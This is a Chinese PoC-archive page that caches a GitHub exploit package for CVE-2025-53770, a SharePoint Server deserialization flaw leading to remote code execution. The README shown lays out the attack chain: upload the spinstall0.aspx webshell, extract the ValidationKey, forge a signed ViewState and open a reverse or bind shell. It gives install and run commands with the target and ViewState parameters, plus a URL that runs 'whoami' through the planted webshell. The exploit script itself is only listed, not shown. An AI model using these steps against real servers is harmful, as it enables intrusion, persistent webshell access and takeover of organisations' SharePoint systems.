POC详情: 445798089e9839045ff3d24ef98661a383e17399

来源
https://github.com/GreenForceNetwork/Toolshell_CVE-2025-53770
关联漏洞
标题: Microsoft SharePoint Server 安全漏洞 (CVE-2025-53770)
描述:Microsoft SharePoint Server是美国微软(Microsoft)公司的一款协作平台。 Microsoft SharePoint Server存在安全漏洞,该漏洞源于反序列化不受信任数据,可能导致远程代码执行。
介绍
# ToolShell → CVE‑2025‑53770 Exploit PoC

This package allows:
1. **Upload webshell** to SharePoint
2. **Extract ValidationKey**
3. **Generate signed ViewState**
4. **RCE via reverse/bind shell**

---

## 🔧 Setup

```bash
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
```
## 🤖 Running 

Upload the webshell

From a SharePoint page you can access the page source .Just go to view source tab and From there if available you would get following, which can copy:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (any current __VIEWSTATE for context)

```bash

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"
```

This uploads spinstall0.aspx.
Check:
https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami
文件快照

 [4.0K]  /data/pocs/445798089e9839045ff3d24ef98661a383e17399
├── [ 890]  README.md
├── [ 605]  spinstall0.aspx
└── [2.0K]  toolshell_exploit.py

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。